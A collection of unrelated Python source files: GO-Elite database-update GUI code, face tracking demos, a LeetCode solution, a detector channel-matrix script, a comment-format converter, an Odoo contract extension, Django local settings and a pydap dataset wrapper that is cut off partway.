        if len(new_species_codes)>0:
            print 'Finished downloading',db_version,'species database files.'
            print_out = "New species data succesfully added to database."
        else:
            print 'Finished downloading',db_version,'OBO database files.'
            print_out = "Ontology structure data succesfully added to database."
        InfoWindow(print_out,'Continue')
        try: root.destroy()
        except Exception: null=[]
    else:
        if root !='' and root !=None: WarningWindow(status,'Error Encountered!'); root.destroy(); GO_Elite.importGOEliteParameters('skip'); sys.exit()
        else: print status; root.destroy(); sys.exit()
def buildNestedOntologies(species_code):
    """Rebuild the nested ontology association files for *species_code*.

    Deletes any existing 'nested' folder first (forcing a rebuild), then
    regenerates nested associations for every ontology available to the
    species' MOD types. No-op if the species database directory is absent.
    """
    if species_code in unique.returnDirectories('/Databases'):
        try:
            ### Delete the existing nested folder (will force rebuilding it)
            export.deleteFolder(filepath('Databases/'+species_code+'/nested'))
        except Exception:
            pass
        ### Creates a nested GO (and stores objects in memory, but not needed
        system_codes, source_types, mod_types = GO_Elite.getSourceData()
        #print species_code,'Building Nested for mod types:',mod_types
        for ontology_name in OBO_import.findAvailableOntologies(species_code, mod_types):
            full_path_db, path_id_to_goid, null = OBO_import.buildNestedOntologyAssociations(species_code, mod_types, ontology_name)
def exportEntrezGO(tax_ids,species_codees,status,option_db,option_list,overwrite_entrezgo,rewrite_existing_EG,root):
    """Parse a downloaded NCBI gene2go file into EntrezGene-GO association files.

    tax_ids/species_codees: parallel lists of NCBI taxonomy ids and GO-Elite
        species codes to process.
    status: status string from the preceding download; an 'Internet' substring
        signals a connection failure.
    option_db/option_list: GUI option definitions, used to re-prompt the user
        when the gene2go file is missing.
    In GUI mode every path ends in a new Tk window or sys.exit.
    """
    if 'over-write previous' in overwrite_entrezgo: overwrite_entrezgo = 'over-write previous' ### The config name is longer
    if 'Internet' not in status:
        import BuildAffymetrixAssociations
        index = 0
        print "Begining to parse NCBI Gene Ontology annotations..."
        for species_code in species_codees:
            tax_id = tax_ids[index]
            if len(tax_id)>0: print "Looking for %s EntrezGene to Gene Ontology associations" % species_code
            # parseGene2GO returns 'run' on success; any failure is treated as 'no'
            try: run_status = BuildAffymetrixAssociations.parseGene2GO(tax_id,species_code,overwrite_entrezgo,rewrite_existing_EG)
            except Exception: run_status = 'no'
            index+=1
        # NOTE(review): run_status is unbound when species_codees is empty —
        # confirm callers always pass at least one species.
        if run_status == 'run':
            print_out = 'Finished building EntrezGene-GeneOntology associations files.'
            if remove_download_files == 'yes':  # module-level flag; presumably set during GUI setup — confirm
                status = export.deleteFolder('BuildDBs/Entrez/Gene2GO'); print status
            InfoWindow(print_out,'Update Complete!')
            continue_to_next_win = Button(text = 'Continue', command = root.destroy)
            continue_to_next_win.pack(side = 'right', padx = 10, pady = 10); root.mainloop()
            GO_Elite.importGOEliteParameters('Create/Modify Databases'); sys.exit()
        else:
            # gene2go.txt missing: offer to download it, which re-enters this parse
            print_out = 'Gene2GO file not found. Select download to obtain database prior to extraction'
            WarningWindow(print_out,'File Not Found!')
            print '\nThe file "gene2go.txt" was not found.\n';
            root.destroy() ###Have to destroy status interface
            root = Tk(); root.title('GO-Elite: Update Options')
            gu = GUI(root,option_db,option_list)
            update_go_entrez = gu.Results()['update_go_entrez']
            if update_go_entrez == 'yes':
                root = Tk(); analysis = 'DownloadEntrezGO'
                values = ncbi_go_file,'BuildDBs/Entrez/Gene2GO/','txt',tax_ids,species_codees,overwrite_entrezgo,rewrite_existing_EG
                StatusWindow(root,'DownloadEntrezGO',values)
                #fln,status = update.download(ncbi_go_file,'BuildDBs/Entrez/Gene2GO/','txt')
                #exportEntrezGO(tax_id,species_code,status,option_db,option_list,root)
            else:
                #print_out = 'Gene2GO file not found. Select download to obtain database prior to extraction'
                #WarningWindow(print_out,'File Not Found!'); root.destroy();
                GO_Elite.importGOEliteParameters('Create/Modify Databases'); sys.exit()
    else: WarningWindow(status,'Error Encountered!'); root.destroy(); GO_Elite.importGOEliteParameters('Create/Modify Databases'); sys.exit()
class importEnsemblSQL:
    """Drive EnsemblSQL to build GO-Elite databases for one species.

    Instantiated from the GUI with a Tk *root*; downloads and parses each
    requested external database. Never returns normally — every path ends by
    restarting the parameter workflow and calling sys.exit.
    """
    def __init__(self,species,species_full,child_dirs,externalDBName_list,overwrite_previous,rewrite_existing,force,ensembl_version,external_system,root):
        """Run the full Ensembl import for *species* using the given options."""
        self._parent = root; import EnsemblSQL
        # process_Ens_go is a module-level flag set elsewhere by the GUI
        if process_Ens_go == 'yes': externalDBName_list.append('GO')
        configType = 'Basic'; iteration=0; proceed = 'yes'
        ### Export Ensembl version information
        try: current_dirversion = unique.getCurrentGeneDatabaseVersion()
        except Exception: current_dirversion = ''
        dirversion = string.replace(ensembl_version,'release-','EnsMart')
        if dirversion not in current_dirversion:
            ### For example: if EnsMart56Plus is current and EnsMart56 is the selected version, keep EnsMart56Plus as current
            exportDBversion(dirversion)
        ### Instead of getting the current version info, get the specific version
        if ensembl_version != 'current':
            try:
                child_dirs, ensembl_species, ensembl_versions = EnsemblSQL.getCurrentEnsemblSpecies(ensembl_version)
            except Exception,e:
                # NOTE(review): run_parameter here must be a module-level name — confirm it is defined at this point
                print_out = "A internet connection could not be established.\nPlease fix the problem before proceeding."
                WarningWindow(e,'Warning!'); root.destroy(); GO_Elite.importGOEliteParameters(run_parameter); sys.exit()
            if species_full not in ensembl_species:
                print_out = 'The selected species is unavailable for\nthe selected version of Ensembl.'
                WarningWindow(print_out,'Species Unavailable!')
                root.destroy(); GO_Elite.importGOEliteParameters('Create/Modify Databases'); sys.exit()
        if proceed == 'yes':
            ensembl_sql_dir,ensembl_sql_description_dir = child_dirs[species_full]
            for externalDBName in externalDBName_list:
                if externalDBName != ' ':
                    # After the first database is built (iteration==1), stop forcing deletion/re-download
                    if force == 'yes' and iteration == 1: force = 'no'
                    import EnsemblSQL; reload(EnsemblSQL)
                    if force == 'yes':
                        output_dir = 'BuildDBs/EnsemblSQL/'+species+'/'
                        try:
                            if force == 'yes': ### Delete any existing data in the destination directory that can muck up tables from a new Ensembl build
                                export.deleteFolder(output_dir)
                        except Exception: null=[]
                    if externalDBName in array_db:
                        # Microarray databases come from the Ensembl FuncGen schema
                        analysisType = 'FuncGen'
                        try: EnsemblSQL.buildGOEliteDBs(species,ensembl_sql_dir,ensembl_sql_description_dir,externalDBName,configType,analysisType,overwrite_previous,rewrite_existing,external_system,force); iteration+=1
                        except Exception, e:
                            print traceback.format_exc()
                            print_out = 'This version of Ensembl appears to have critical incompatibilites with GO-Elite.\nDownload the latest version of GO-Elite or contact the development team'
                            WarningWindow(print_out,'Species Unavailable!')
                            root.destroy(); GO_Elite.importGOEliteParameters('Create/Modify Databases'); sys.exit()
                    else:
                        analysisType = 'GeneAndExternal'
                        try: EnsemblSQL.buildGOEliteDBs(species,ensembl_sql_dir,ensembl_sql_description_dir,externalDBName,configType,analysisType,overwrite_previous,rewrite_existing,external_system,force); iteration+=1
                        except Exception, e:
                            print_out = 'This version of Ensembl appears to have critical incompatibilites with GO-Elite.\nDownload the latest version of GO-Elite or contact the development team'
                            WarningWindow(print_out,'Species Unavailable!')
                            root.destroy(); GO_Elite.importGOEliteParameters('Create/Modify Databases'); sys.exit()
            if remove_download_files == 'yes': export.deleteFolder('BuildDBs/EnsemblSQL/'+species)
        print_out = 'Finished installing the selected Ensembl databases.'
        InfoWindow(print_out,'Update Complete!')
        continue_to_next_win = Button(text = 'Continue', command = root.destroy)
        continue_to_next_win.pack(side = 'right', padx = 10, pady = 10);
        quit_button = Button(root,text='Quit', command=self.quit)
        quit_button.pack(side = 'right', padx = 10, pady = 10)
        root.mainloop()
        GO_Elite.importGOEliteParameters('Create/Modify Databases'); sys.exit()
    def quit(self):
        """Tear down the Tk parent window and exit the process."""
        #print "quit starts"
        #print "cleaning up things..."
        self._parent.quit()
        self._parent.destroy()
        sys.exit()
def importExternalDBs(species_full):
    """Assemble the set of Ensembl external databases/arrays available for a species.

    Reads three config files:
      - Config/EnsExternalDBs.txt: curated databases with system codes plus
        optional species restriction/exclusion columns
      - Config/external_db.txt: raw Ensembl external_db dump (id, name)
      - Config/array.txt: Ensembl FuncGen array list (vendor and array name)

    Returns (external_dbs, external_system, array_db, external_ids):
      external_dbs: sorted unique list of database display names (plus ' ')
      external_system: database name -> GO-Elite system code
      array_db: vendor_array name -> [] (also stored as a module global)
      external_ids: database name -> Ensembl external_db numeric id
    """
    filename = 'Config/EnsExternalDBs.txt'
    fn=filepath(filename); x = 0; external_dbs=[]; external_system={}; all_databases={}; external_ids={}
    for line in open(fn,'rU').readlines():
        data = cleanUpLine(line)
        if x==0: x=1  # skip the header row
        else:
            id, database, species_specific, exclude, system_code = string.split(data,'\t')
            external_ids[database] = int(id)
            if database != 'GO':
                all_databases[database]=system_code
                # Keep only entries valid for this species and not excluded
                if (species_full == species_specific) or len(species_specific)<2:
                    if len(exclude)<2:
                        external_system[database] = system_code
    filename = 'Config/external_db.txt'; external_system2={}
    fn=filepath(filename)
    for line in open(fn,'rU').readlines():
        data = cleanUpLine(line)
        try:
            t = string.split(data,'\t'); id = int(t[0]); database = t[1]
            external_ids[database] = id
            if database in external_system:
                external_system2[database] = external_system[database]
            elif database not in all_databases: ### Add it if it's new
                try:
                    # Derive a short placeholder system code from the name
                    try: system = database[:3]
                    except Exception: system = database[:2]
                    external_system2[database] = system
                except Exception: null=[]
        except Exception: null=[] ### Occurs when a bad end of line is present
    filename = 'Config/array.txt'
    global array_db; array_db={}
    fn=filepath(filename)
    for line in open(fn,'rU').readlines():
        data = cleanUpLine(line)
        t = string.split(data,'\t')
        try:
            array = t[1]; vendor = t[3]
            database = vendor+'_'+array; array_db[database]=[]
            if database in external_system:
                external_system2[database] = external_system[database]
            if database in all_databases:
                external_system2[database] = all_databases[database]
            elif database not in all_databases: ### Add it if it's new
                try:
                    ### BUG FIX: these were independent 'if' statements, so the trailing
                    ### 'else' re-assigned 'Ma' for every non-AGILENT vendor and the
                    ### AFFY/ILLUMINA/CODELINK codes could never survive. Use elif.
                    if vendor == 'AFFY': system = 'X'
                    elif vendor == 'ILLUMINA': system = 'Il'
                    elif vendor == 'CODELINK': system = 'Co'
                    elif vendor == 'AGILENT': system = 'Ag'
                    else: system = 'Ma' ###Miscelaneous Array type
                    external_system2[database] = system
                except Exception: null=[]
        except Exception: null=[]
    external_system = external_system2
    #try: del external_system['GO']
    #except Exception: null=[]
    for database in external_system: external_dbs.append(database)
    external_dbs.append(' '); external_dbs = unique.unique(external_dbs); external_dbs.sort()
    return external_dbs,external_system,array_db,external_ids
def downloadFiles(file,dir,file_type,tax_id,species_code,overwrite_entrezgo,rewrite_existing_EG,root):
    """Download one NCBI annotation file, then parse EntrezGene-GO relationships from it.

    On a connection failure ('Internet' in the download status) the user is
    warned and the main parameter workflow restarts (does not return).
    """
    fln, status = update.download(file, dir, file_type)
    if 'Internet' not in status:
        exportEntrezGO(tax_id, species_code, status, {}, {}, overwrite_entrezgo, rewrite_existing_EG, root)
    else:
        WarningWindow(status, 'Error Encountered!')
        root.destroy()
        GO_Elite.importGOEliteParameters('Create/Modify Databases')
        sys.exit()
def testPNGView():
    """Debug helper: display a hard-coded PNG inside a scrollable Tk toplevel."""
    top = Toplevel()
    scrolled = PmwFreeze.ScrolledFrame(top,
            labelpos = 'n', label_text = '',
            usehullsize = 1, hull_width = 800, hull_height = 550)
    scrolled.pack(padx = 0, pady = 0, fill = 'both', expand = 1)
    inner = scrolled.interior()
    filename = "/Users/nsalomonis/Desktop/code/AltAnalyze/datasets/3'Array/Kristina-Athro/DataPlots/WP1403-GE.Homozygot_vs_Control_AMPK signaling.png"
    top.title(filename)
    img = ImageTk.PhotoImage(file=filename)
    canvas = Canvas(inner)
    canvas.pack(fill=BOTH, padx = 0, pady = 0)
    # Size the canvas to the image so no scrolling artifacts appear inside it
    canvas.config(width=img.width(), height=img.height())
    canvas.create_image(2, 2, image=img, anchor=NW)
    top.mainloop()
if __name__ == '__main__':
    # Launch the interactive parameter-collection workflow and echo the result.
    user_variables=[]
    run_parameter = 'intro'
    vals = getUserParameters(run_parameter)
    print vals
|
"""
Created by Alex Wang
On 2018-07-20
"""
import os
import sys
import shutil
import traceback
import numpy as np
import cv2
from face import face_detect
import sort
import opencv_trackers
def rectangle(image, x, y, w, h, color, thickness=2, label=None):
    """Draw an axis-aligned rectangle on *image*, optionally with a filled label.

    Parameters
    ----------
    image : ndarray
        Image to draw on (modified in place).
    x : float | int
        Top left corner of the rectangle (x-axis).
    y : float | int
        Top left corner of the rectangle (y-axis).
    w : float | int
        Width of the rectangle.
    h : float | int
        Height of the rectangle.
    color : tuple
        Outline (and label background) color.
    thickness : int
        Outline and label-text thickness.
    label : Optional[str]
        A text label that is placed at the top left corner of the
        rectangle.
    """
    top_left = (int(x), int(y))
    bottom_right = (int(x + w), int(y + h))
    cv2.rectangle(image, top_left, bottom_right, color, thickness)
    if label is None:
        return
    size, _baseline = cv2.getTextSize(label, cv2.FONT_HERSHEY_PLAIN, 1, thickness)
    text_origin = (top_left[0] + 5, top_left[1] + 5 + size[1])
    label_corner = (top_left[0] + 10 + size[0], top_left[1] + 10 + size[1])
    # Filled background box behind the label, then the label text in white
    cv2.rectangle(image, top_left, label_corner, color, -1)
    cv2.putText(image, label, text_origin, cv2.FONT_HERSHEY_PLAIN,
                1, (255, 255, 255), thickness)
def recreate_dir(dir_path):
    """Reset *dir_path* to an empty directory, removing any previous contents."""
    if os.path.exists(dir_path):
        shutil.rmtree(dir_path)  # drop the old tree first
    os.makedirs(dir_path)
def face_detect_frame():
    """Run per-frame face detection on a list of videos and track faces with SORT.

    Reads videos from a hard-coded local directory, draws tracked boxes on each
    frame, shows a preview window and writes an annotated copy of the video
    next to the source file.
    """
    method_type = 'hog'  # 'hog' or 'cnn' detector backend (see branches below)
    video_root = '/Users/alexwang/data'
    video_list = ['14456458.mp4', '32974696.mp4', '16815015.mp4', '10616634.mp4']
    colours = np.random.rand(32, 3) * 256  # used only for display
    print('start process videos...')
    for video_name in video_list:
        # Fresh tracker per video; clear_count on a throwaway KalmanBoxTracker
        # presumably resets the global track-id counter — confirm in sort.py
        video_tracker = sort.Sort(max_age=5)
        kal = sort.KalmanBoxTracker([0, 0, 1, 1, 0])
        kal.clear_count()
        cap = cv2.VideoCapture(os.path.join(video_root, video_name))
        frame_width = int(cap.get(3))   # 3 == CAP_PROP_FRAME_WIDTH
        frame_height = int(cap.get(4))  # 4 == CAP_PROP_FRAME_HEIGHT
        output_path = os.path.join(video_root, 'notexpand_{}_{}'.format(method_type, video_name))
        out = cv2.VideoWriter(output_path, cv2.VideoWriter_fourcc(*'MP4V'), 15, (frame_width, frame_height))
        while (cap.isOpened()):
            try:
                ret, frame = cap.read()
                if not ret:
                    break
                image_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
                if method_type == 'cnn':
                    face_img_list = face_detect.cnn_face_detect(image_rgb, expand=False)
                else:
                    face_img_list = face_detect.hog_face_detect(image_rgb, expand=False)
                # Keep only confident detections; rows are [x1, y1, x2, y2, score]
                detections = []
                for (face, rect, score) in face_img_list:
                    if score < 0.4:
                        continue
                    x_min, y_min, x_max, y_max = rect
                    detections.append([x_min, y_min, x_max, y_max, 10 * score])
                print('detections:', detections)
                track_bbs_ids = video_tracker.update(np.asarray(detections))
                for d in track_bbs_ids:
                    print('d:', d)
                    d = d.astype(np.int32)
                    # d[0:4] are the box corners; d[4] selects the colour and label
                    rectangle(frame, d[0], d[1], d[2] - d[0],
                              d[3] - d[1], colours[d[4] % 32, :],
                              thickness=2, label=str(d[4]))
                cv2.imshow('image', frame)
                out.write(frame)
                # Exit if ESC pressed
                key = cv2.waitKey(1) & 0xff
                if key == 27:
                    sys.exit(0)
                elif key == ord('q'):
                    break
            except Exception as e:
                traceback.print_exc()
        cap.release()
        out.release()
def test_Kalman():
    """Smoke test: construct a KalmanBoxTracker and index a detections array."""
    tracker = sort.KalmanBoxTracker([260, 69, 78, 85, 1.2872009431190912])
    dets = np.asarray([[260, 69, 78, 85, 1.1129303132362787]])
    print(dets[0, :])
def test_opencv_tracker():
    """Face tracking demo using OpenCV trackers between detector runs.

    The detector only runs every frame_gap-th frame; on the frames in between,
    the OpenCV trackers propagate the previously detected boxes. Output is
    shown in a preview window and written to an annotated video copy.
    """
    method_type = 'hog'  # 'hog' or 'cnn' detector backend
    video_root = '/Users/alexwang/data'
    video_list = ['32974696.mp4', '14456458.mp4', '16815015.mp4', '10616634.mp4']
    colours = np.random.rand(32, 3) * 256  # used only for display
    print('start process videos...')
    for video_name in video_list:
        video_tracker = opencv_trackers.Trackers()
        cap = cv2.VideoCapture(os.path.join(video_root, video_name))
        frame_width = int(cap.get(3))   # 3 == CAP_PROP_FRAME_WIDTH
        frame_height = int(cap.get(4))  # 4 == CAP_PROP_FRAME_HEIGHT
        output_path = os.path.join(video_root, 'notexpand_opencv_{}_{}'.format(method_type, video_name))
        out = cv2.VideoWriter(output_path, cv2.VideoWriter_fourcc(*'MP4V'), 15, (frame_width, frame_height))
        frame_idx = 0
        frame_gap = 3  # run the (expensive) detector on every 3rd frame only
        while (cap.isOpened()):
            try:
                ret, frame = cap.read()
                if not ret:
                    break
                frame_idx += 1
                image_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
                if frame_idx % frame_gap == 1:
                    if method_type == 'cnn':
                        face_img_list = face_detect.cnn_face_detect(image_rgb, expand=False)
                    else:
                        face_img_list = face_detect.hog_face_detect(image_rgb, expand=False)
                    # Keep only confident detections; rows are [x1, y1, x2, y2, score]
                    detections = []
                    for (face, rect, score) in face_img_list:
                        if score < 0.4:
                            continue
                        x_min, y_min, x_max, y_max = rect
                        detections.append([x_min, y_min, x_max, y_max, 10 * score])
                    # print('detections:', detections)
                if frame_idx % frame_gap == 1:
                    # Detector frame: refresh trackers from the new detections
                    track_bbs_ids = video_tracker.update_and_detect(frame, np.asarray(detections))
                else:
                    # In-between frame: just advance the existing trackers
                    track_bbs_ids = video_tracker.update(frame)
                for tracker_info in track_bbs_ids:
                    d = tracker_info['box']
                    d = np.asarray(list(d))
                    print('d:', d)
                    d = d.astype(np.int32)
                    rectangle(frame, d[0], d[1], d[2] - d[0],
                              d[3] - d[1], colours[tracker_info['count'] % 32, :],
                              thickness=2, label=str(tracker_info['count']))
                cv2.imshow('image', frame)
                out.write(frame)
                # Exit if ESC pressed
                key = cv2.waitKey(1) & 0xff
                if key == 27:
                    sys.exit(0)
                elif key == ord('q'):
                    break
            except Exception as e:
                traceback.print_exc()
        cap.release()
        out.release()
if __name__ == "__main__":
    # Run the SORT-based tracking demo by default; the commented calls are
    # alternative manual test entry points.
    face_detect_frame()
    # test_Kalman()
    # test_opencv_tracker()
|
class Solution:
    def wordPattern(self, pattern: str, s: str) -> bool:
        """Return True if the words of *s* follow *pattern* bijectively.

        Each pattern character must map to exactly one word and vice versa:
        "abba" matches "dog cat cat dog" but not "dog dog dog dog".

        Improvements over the original: drops the unused `dic` mapping,
        compares first-occurrence indices directly instead of building two
        throwaway strings, and returns the boolean expression itself.
        """
        words = s.split()
        if len(words) != len(pattern):
            return False
        # First index at which each character/word was seen; the two
        # normalized sequences must agree position-by-position.
        first_of_char = {}
        first_of_word = {}
        for i, (ch, word) in enumerate(zip(pattern, words)):
            if first_of_char.setdefault(ch, i) != first_of_word.setdefault(word, i):
                return False
        return True
import os,sys
import numpy as np
import ROOT
from root_numpy import root2array, root2rec, tree2rec
import pandas as pd
from badchtable import get_badchtable
from pulsed_list import get_pulsed_channel_list
def get_index( crate, slot, femch ):
    """Map a (crate, slot, femch) readout address to a flat channel index.

    Each crate holds 15 slots (numbered starting at 4), each with 64 FEM
    channels, giving crate*960 + (slot-4)*64 + femch.
    """
    channels_per_slot = 64
    slots_per_crate = 15
    return (crate * slots_per_crate + (slot - 4)) * channels_per_slot + femch
def get_pulsed_index_array( pulsed_list ):
    """Convert a list of (crate, slot, femch) tuples to flat channel indices."""
    return [get_index(crate, slot, femch) for (crate, slot, femch) in pulsed_list]
def make_adc_matrix(run):
    """Build a 9600x9600 channel-vs-channel amplitude matrix for one run.

    Loads output/run%03d.npz (produced upstream), places each channel's
    max_amp at its flat hist_index, and returns (sqrt-of-outer-product matrix,
    pulsed channel indices, bad channel indices). Returns None when the npz
    file is missing.
    """
    ampcov = np.zeros( (9600,9600) )  # NOTE(review): unused — the result is built from np.outer below
    npzfile = 'output/run%03d.npz'%(run)
    if not os.path.exists(npzfile):
        print "skip ",npzfile
        return
    print "extracting ",npzfile
    datanpz = np.load( npzfile )
    data = datanpz['outdf']
    df = pd.DataFrame( data )
    # index channels
    df['hist_index'] = np.vectorize( get_index )( df['crate'], df['slot'], df['femch'] )
    df.drop( 'index', axis=1, inplace=True )
    print df.columns
    outarr = df.to_records()
    #x1 = df.sort('hist_index')['mean_amp'].values
    # NOTE(review): DataFrame.sort() was removed in pandas 0.20+ (sort_values
    # is the replacement); this code requires an old pandas — confirm environment.
    x1 = df.sort('hist_index')['max_amp'].values
    # Scatter amplitudes into a dense 9600-entry vector indexed by channel
    y1 = np.zeros(9600)
    y1[ df.sort('hist_index')['hist_index'].values ] = x1[:]
    #x1[:] /= df['mean_ped_mean'].values
    # Geometric-mean style pairing: sqrt(amp_i * amp_j) for every channel pair
    xx = np.outer( y1, y1 )
    xx = np.sqrt(xx)
    pulsed = df[ df['pulsed']==1 ]['hist_index'].values
    badch = df[ df['badch']==1 ]['hist_index'].values
    print "NPULSED:",len(pulsed)
    print pulsed
    return xx, pulsed,badch
if __name__ == "__main__":
    # Build the amplitude matrix for run 83 and archive it together with the
    # pulsed/bad channel lists.
    # NOTE(review): make_adc_matrix returns None when the npz file is missing,
    # which would make this unpack fail — confirm run 83's output exists.
    run = 83
    result,pulsed,badch = make_adc_matrix(run)
    np.savez('covamp_run%03d'%(run),mat=result,pulsedlist=pulsed,badchlist=badch)
|
import os
import re
import glob
# global comment tracker
# Module-level state shared by process_line(): whether the current and the
# previous line fell inside a '//' comment run being converted to /** ... */.
in_comment_section = False
prev_comment_section = False
# returns either an empty string, the unmodified line, or a replaced line
def process_line(line):
    """Convert one line of a C/C++ header from '//' comments to /** */ doc
    comments.

    Returns '' (line dropped), the unmodified line, or a rewritten line.
    Relies on the module-level in_comment_section/prev_comment_section
    state, so lines MUST be fed in file order.
    """
    global in_comment_section
    global prev_comment_section
    # Line classifiers (checked in priority order below).
    section_match = re.compile(r'^\s{0,}// #')       # '// #' section headers -> dropped
    line_match = re.compile(r'^\s{0,}// ')           # ordinary '// ' comment line
    space_match = re.compile(r'^\s{0,}//$')          # bare '//' spacer line
    code_section_match = re.compile(r'^\s{0,}// ~~~~')  # '// ~~~~' rulers -> dropped
    prev_comment_section = in_comment_section
    if section_match.match(line):
        return ''
    elif code_section_match.match(line):
        return ''
    if space_match.match(line):
        outline = space_match.sub('', line)
    elif line_match.match(line):
        # First comment line of a run opens the doc block with '/** '.
        if not in_comment_section:
            outline = line_match.sub('/** ', line)
        else:
            outline = line_match.sub('', line)
        #print(outline)
        in_comment_section = True
    else:
        # Non-comment line: a non-empty one ends the comment run.
        if (len(line) > 0):
            in_comment_section = False
        # Close the doc block when we just left a comment run.
        if not in_comment_section and prev_comment_section:
            outline = '*/\n{}'.format(line)
        else:
            outline = line
    # delete empty lines inside of comments
    if len(outline.strip(' ').strip('\t').strip('\n')) == 0 and in_comment_section:
        outline = ''
    return outline
def main():
    """Rewrite every modules/*.h file in place, converting '//' comment
    blocks to /** ... */ doc comments via process_line()."""
    parse_ext = '.h'
    src_dir = os.path.abspath('modules')
    # Fix: use the extension constant instead of repeating the literal
    # (parse_ext was previously defined but unused).
    infiles = glob.glob(src_dir + '/*' + parse_ext)
    for infile in infiles:
        print("Parsing {}".format(infile))
        # Context managers guarantee the file handles are closed even if
        # process_line raises; the redundant newlines='' pre-init is gone.
        with open(infile, 'r') as f:
            newlines = list(map(process_line, f.readlines()))
        with open(infile, 'w') as f:
            f.writelines(newlines)


if __name__ == '__main__':
    main()
|
# -*- coding: utf-8 -*-
from odoo import models, api, fields
from datetime import date
class HrContract(models.Model):
    """Extend hr.contract with a salary-history log written on activation."""

    _inherit = 'hr.contract'

    historial_salario_ids = fields.One2many('contract.historial.salario', 'contract_id', 'Historial Salario')

    @api.multi
    def write(self, vals):
        """After a write that moves the contract to the 'open' state,
        snapshot each contract's salary figures into
        contract.historial.salario."""
        res = super(HrContract, self).write(vals)
        if vals.get('state', '') != 'open':
            return res
        historial = self.env['contract.historial.salario']
        for contract in self:
            snapshot = {
                'fecha_sueldo': date.today(),
                'sueldo_mensual': contract.wage,
                'sueldo_diario': contract.sueldo_diario,
                'sueldo_por_hora': contract.sueldo_hora,
                'sueldo_diario_integrado': contract.sueldo_diario_integrado,
                'sueldo_base_cotizacion': contract.sueldo_base_cotizacion,
                'contract_id': contract.id,
            }
            historial.create(snapshot)
        return res
|
import os
from .common import Common
# Repository root: two directory levels above this settings module.
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))

class Local(Common):
    """Local-development Django settings: debug on, all hosts allowed,
    nose test runner with coverage, console email backend."""
    DEBUG = True
    SECRET_KEY = 'local'
    # Testing
    ALLOWED_HOSTS = [
        "*",
    ]
    INSTALLED_APPS = Common.INSTALLED_APPS
    INSTALLED_APPS += (
        'uritemplate',
        'corsheaders',
        'django_nose',
    )
    # CorsMiddleware must sit above CommonMiddleware (django-cors-headers
    # requirement) -- order matters here.
    MIDDLEWARE = (
        'django.middleware.security.SecurityMiddleware',
        'django.contrib.sessions.middleware.SessionMiddleware',
        'corsheaders.middleware.CorsMiddleware',
        'django.middleware.common.CommonMiddleware',
        'django.middleware.csrf.CsrfViewMiddleware',
        'django.contrib.auth.middleware.AuthenticationMiddleware',
        'django.contrib.messages.middleware.MessageMiddleware',
        'django.middleware.clickjacking.XFrameOptionsMiddleware',
    )
    TEST_RUNNER = 'django_nose.NoseTestSuiteRunner'
    NOSE_ARGS = [
        BASE_DIR,
        '-s',
        '--nologcapture',
        '--with-coverage',
        '--with-progressive',
        '--cover-package=jiaju'
    ]
    # Mail: print messages to the console instead of sending them.
    EMAIL_HOST = 'localhost'
    EMAIL_PORT = 1025
    EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
    CORS_ORIGIN_WHITELIST = [
        "http://localhost:8088",
    ]
|
import logging
import os, sys
import json
import time
import numpy as np
#from pydap.handlers.dap import DAPHandler
from pydap.client import open_url#, Functions
from pydap.cas.urs import setup_session
HOME = os.path.expanduser('~')
info = os.path.join(HOME, '.earthdataloginrc')
# Load Earthdata login credentials from ~/.earthdataloginrc (JSON with
# 'user' and 'passwd' keys) at import time; leave both None when absent.
if os.path.isfile(info):
    with open(info, 'rb') as fid:
        info = json.load(fid)
    USER = info['user']
    PASSWD = info['passwd']
else:
    USER = None
    PASSWD = None
# Log-message template for failed download attempts.
FAILEDFMT = 'Attempt {:2d} of {:2d} - Failed to get {}'
# numpy byte-order characters for this machine ('<' or '>') and its opposite.
LITTLEEND = sys.byteorder == 'little'
NATIVE = LITTLEEND and '<' or '>'
SWAPPED = LITTLEEND and '>' or '<'
# Dead code: earlier DAPHandler-based implementation kept for reference
# (the module-level triple-quoted string has no runtime effect).
"""
class PyDAPDataset( DAPHandler ):
    def __init__(self, url, **kwargs ):
        session = kwargs.pop('session', None)
        if not session:
            session = setup_session( kwargs.get('username', decoder(USER)),
                                     kwargs.get('password', decoder(PASSWD)),
                                     check_url = url )
        application = kwargs.pop('application', None)
        output_grid = kwargs.pop('output_grid', True)
        super().__init__(url, application, session, output_grid, **kwargs)
        self.dataset.functions = Functions(url, application, session)
    def __getitem__(self, key):
        if self.dataset:
            return self.dataset.get(key, None)
        return None
    def __getattr__(self, key):
        if self.dataset:
            return getattr(self.dataset, key, None)
        return None
    def __contains__(self, key):
        return key in self.dataset
"""
def scaleFillData(data, atts, fillValue = None):
    """Apply CF packing attributes and replace fill/missing values.

    Arguments:
        data      : numpy array of raw (packed) values
        atts      : variable-attribute dict; recognizes '_FillValue',
                    'missing_value', 'scale_factor', 'add_offset'
        fillValue : replacement for bad points (default: NaN)

    Returns the unpacked array; it is promoted to float32 when NaN
    replacement requires a float dtype.
    """
    log = logging.getLogger(__name__)
    # Locate bad points BEFORE scaling, against the raw packed values.
    bad = None
    if '_FillValue' in atts:
        log.debug( 'Searching for Fill Values in data' )
        bad = (data == atts['_FillValue'])
    else:
        log.debug( "No '_FillValue' attribute" )
    if 'missing_value' in atts:
        log.debug( 'Searching for missing values in data' )
        missing = (data == atts['missing_value'])
        bad = missing if bad is None else (missing | bad)
    else:
        log.debug( "No 'missing_value' attribute" )
    # CF conventions allow scale_factor and add_offset to appear
    # independently (defaults 1.0 / 0.0); the original required both.
    if 'scale_factor' in atts or 'add_offset' in atts:
        log.debug( "Scaling to data" )
        data = data * atts.get('scale_factor', 1.0) + atts.get('add_offset', 0.0)
    if bad is not None and bad.any():
        log.debug( 'Replacing missing and fill values with NaN characters' )
        if data.dtype.kind != 'f':
            log.debug( 'Converting data to floating point array' )
            data = data.astype(np.float32)
        data[bad] = np.nan if fillValue is None else fillValue
    return data
class PyDAPDataset():
    """Wrapper around a remote pydap dataset with retry/reload logic.

    Item and attribute access is delegated to the underlying pydap
    dataset.  Failed downloads trigger a close, a long random delay, a
    reopen, and a retry (up to the 'retry' keyword, default 3).
    """

    def __init__(self, url, **kwargs):
        self._session = None
        self._dataset = None
        self.log = logging.getLogger(__name__)
        self.url = url
        self.retry = kwargs.get('retry', 3)   # max attempts per request
        self.kwargs = kwargs
        self._initDataset()

    def __getitem__(self, key):
        """Dict-style variable access; None when closed or not found."""
        if self._dataset:
            return self._dataset.get(key, None)
        return None

    def __getattr__(self, key):
